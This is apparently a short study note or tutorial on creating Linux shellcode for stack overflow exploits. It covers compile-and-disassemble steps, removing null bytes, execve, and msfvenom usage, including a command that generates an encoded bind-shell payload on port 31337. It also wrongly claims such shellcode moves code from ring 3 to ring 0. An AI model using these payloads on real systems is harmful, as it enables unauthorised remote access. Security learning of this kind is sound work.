Creating Shellcode

Shellcode is injected into programs that have the stack overflow vulnerability.

Shellcode is comprised of opcodes which construct certain system calls allowing the user to escalate access from ring 3 to ring 0 and be able to access the kernel.

5 Steps to Create

Write high-level code.
Compile and disassemble.
Analyze the assembly.
Clean up assembly, remove nulls.
Extract commands and create shellcode.

Gaining the Shell

There are 2 ways to create a new process for the shell in Linux:

execve() - used to create a new process and kill the other instance of it. It takes 3 arguments (pointer to sh, pointer to argument array, pointer to env vars)
fork() + execve - create a copy of the running process.

Caveats

Certain opcodes will terminate programs. Instructions that contain null need to be rewritten:
- mov ebx,0 => xor ebx,ebx
- mov eax,1 => mov al,1

The opcodes which would terminate a program are the following:

null bytes (0x00)
Line Feed (0x0A)
Carriage Return (0D)

To see the system calls of an executable, we can run:

strace /path/to/executable

`msfvenom`

We can use msfvenom from the Metasploit toolkit to generate shellcode.

List payloads

sudo msfvenom -l payloads | grep linux | grep bind_tcp

Generate Shellcode

To generate shellcode for a remote shell to listen on port 31337 and have the payload only contain alphanumeric characters in Python for Linux:

msfvenom -p linux/x86/shell_bind_tcp LPORT=31337 AppendExit=true --encoder x86/alpha_mixed -f python -o $OUTPUT_PATH.py

List of platforms:

msfvenom --list platforms

5 Steps to Create​

Gaining the Shell​

Caveats​

msfvenom​

List payloads​

Generate Shellcode​

List of platforms:​